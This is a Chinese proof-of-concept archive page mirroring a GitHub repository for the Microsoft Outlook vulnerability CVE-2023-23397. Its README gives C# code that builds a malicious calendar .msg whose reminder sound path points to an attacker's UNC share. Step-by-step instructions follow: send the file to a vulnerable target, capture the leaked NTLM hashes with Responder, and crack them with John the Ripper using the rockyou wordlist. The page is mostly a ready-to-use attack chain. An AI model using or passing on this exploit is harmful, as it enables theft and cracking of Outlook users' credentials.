POC详情: 00254fbcc8c7cece32d395b6938a5026a02387c5

来源
https://github.com/moneertv/CVE-2023-23397
关联漏洞
标题: Microsoft Outlook 安全漏洞 (CVE-2023-23397)
描述:Microsoft Outlook是美国微软(Microsoft)公司的一套电子邮件应用程序。 Microsoft Outlook存在安全漏洞。以下产品和版本受到影响:Microsoft Office LTSC 2021 for 32-bit editions,Microsoft Outlook 2016 (32-bit edition),Microsoft Office LTSC 2021 for 64-bit editions,Microsoft 365 Apps for Enterprise for
描述
CVE-2023-23397 C# PoC
介绍
# CVE-2023-23397
CVE-2023-23397 C# PoC 
1- download the msgkit
2- edit the appointment class and add the below:
	![image](https://user-images.githubusercontent.com/67332723/226142082-b9565fe4-dad7-41d5-9b77-c1c47206ecc6.png)

	
3- create a new class inside the project to set the proprieties of the msg file:
	
	using MsgKit.Enums;
	using System;
	using System.Collections.Generic;
	using System.Linq;
	using System.Text;
	using System.Threading.Tasks;
	
	namespace MsgKit
	{
	    class Program
	    {
	        static void Main(string[] args)
	        {
	            using (var appointment = new Appointment(
	            new Sender("moneertv@gmail.com", "moneertv"),
	            new Representing("moneertv@gmail.com", "moneertv"),
	            "CVE-2023-23397"))
	            {
	                appointment.Recipients.AddTo("moneer-1998@hotmail.com", "muneer aqraa");
	                appointment.Subject = "CVE-2023-23397";
	                appointment.Location = "Neverland";
	                appointment.MeetingStart = DateTime.Now.Date.AddDays(2).Date;
	                appointment.MeetingEnd = DateTime.Now.Date.AddDays(3).Date;
	                appointment.AllDay = true;
	                appointment.BodyText = "CVE-2023-23397";
	                appointment.BodyHtml = "<html><head></head><body><b>testing CVE-2023-23397</b></body></html>";
	                appointment.SentOn = DateTime.UtcNow;
	                appointment.Importance = MessageImportance.IMPORTANCE_NORMAL;
	                appointment.IconIndex = MessageIconIndex.UnsentMail;
	
	                appointment.PidLidReminderFileParameter = @"\\192.168.1.222\";
	                appointment.PidLidReminderOverride = true;
	
	                appointment.Save(@"C:\Users\Moneer\Desktop\exploits\CVE-2023-23397\MsgKit-master\generated email msg\dirty.msg");
	
	            }
	
	        }
	    }
	}
	
4- change the properties for the project output type to console:
	![image](https://user-images.githubusercontent.com/67332723/226142091-ddc48a60-93e7-4064-b845-06818377da3b.png)

	
5- run the project to generate the dirty.msg

6- send the message to a vulnerable target, and wait tell the reminder of the meeting activate.

6-2- while waiting, on the kali machine which we have put its IP on the main class, run the below command to keep listening for any one who got the bait: # responder -I eth0 -v

7- once you got the hashes, store them in a file, and run the john ripper on the hashes against a wordlist (ex: rockyou)
文件快照

 [4.0K]  /data/pocs/00254fbcc8c7cece32d395b6938a5026a02387c5
├── [5.7K]  Appointment.cs
├── [1.5K]  Class2.cs
└── [2.4K]  README.md

0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。